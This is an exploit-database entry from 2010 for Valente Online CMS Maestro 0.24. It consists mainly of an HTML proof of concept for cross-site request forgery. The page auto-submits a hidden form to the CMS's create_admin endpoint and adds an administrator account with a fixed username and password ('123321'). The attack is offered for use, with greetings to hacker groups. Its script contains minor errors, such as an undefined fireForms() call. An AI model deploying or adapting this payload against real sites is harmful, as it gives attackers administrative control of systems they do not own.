Valente Online CMS Meastro - CSRF Add Admin Account

2010-08-14T00:00:00
ID 1337DAY-ID-13701
Type zdt
Reporter Mr.Hx
Modified 2010-08-14T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ===================================================
Valente Online CMS Meastro - CSRF Add Admin Account
===================================================


# Exploit Title: Valente Online CMS Meastro - [CSRF] Add Admin Account
# Author: Mr.Hx & [email protected]
# Software Link: http://valenteonline.com
# Software Download: http://valenteonline.com/cms-maestro-downloads
# Type : CSRF
# Version: 0.24
# Greetz to : ShOzN & Group alm3r3fh & Sinor & Group HeRoEs & And All My Friends 
##################### Exploit Add Admin Account ##########################
<html>
<body onload="javascript:fireForms()">
<form method="POST" name="form0"
action="http://site.com/valente/admin.php?p=create_admin">
<input type="hidden" name="username" value="[email protected]"/>
<input type="hidden" name="level" value="1"/>
<input type="hidden" name="password1" value="123321"/>
<input type="hidden" name="password2" value="123321"/>
<input type="submit" name="create" value="create"/>
<script>
document.getElementById('create').click();
</script>
</form>
</body>
</html>



#  0day.today [2018-01-10]  #